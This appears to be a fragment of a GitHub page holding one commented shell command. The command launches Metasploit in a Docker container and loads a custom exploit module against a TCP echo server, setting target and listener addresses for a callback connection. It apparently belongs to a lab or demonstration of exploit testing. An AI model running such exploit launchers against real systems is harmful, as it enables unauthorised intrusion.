You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# Start metasploit and hope we get the same IP address.
docker run -it --rm --name $loc -v $PWD/exploits:/usr/share/metasploit-framework/modules/exploits/custom polyverse/$loc msfconsole -x "use exploit/custom/tcp_echo_server.rb; set RHOST $RHOST; set RPORT 8080; set LHOST $LHOST; set LPORT 5555"